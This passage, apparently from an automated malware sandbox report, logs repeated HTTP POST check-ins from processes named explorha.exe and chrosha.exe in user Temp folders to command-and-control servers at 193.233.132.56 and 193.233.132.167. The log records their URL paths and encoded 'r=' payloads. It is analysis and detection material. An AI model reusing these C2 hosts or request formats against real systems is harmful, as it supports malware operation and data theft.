                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:07.734349966 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      686192.168.2.550532193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:07.806180954 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:08.054105997 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      687192.168.2.550533193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:08.082968950 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:08.326955080 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      688192.168.2.550534193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:08.307384014 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:08.561686039 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      689192.168.2.550535193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:08.577044010 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:08.828504086 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      690192.168.2.550536193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:08.931102037 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:09.180078030 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      691192.168.2.550537193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:09.201700926 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:09.449883938 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      692192.168.2.550538193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:09.434240103 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:09.687099934 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      693192.168.2.550539193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:09.699390888 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:09.949911118 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      694192.168.2.550540193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:10.042725086 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:10.291435003 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      695192.168.2.550541193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:10.303426981 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:10.548979998 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      696192.168.2.550542193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:10.539582968 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:10.788640976 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      697192.168.2.550543193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:10.803433895 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:11.059469938 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:10 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      698192.168.2.550544193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:11.149333000 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:11.396939993 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      699192.168.2.550545193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:11.417512894 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:11.663871050 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      700192.168.2.550546193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:11.652049065 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:11.907391071 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      701192.168.2.550547193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:11.908889055 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:12.155509949 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


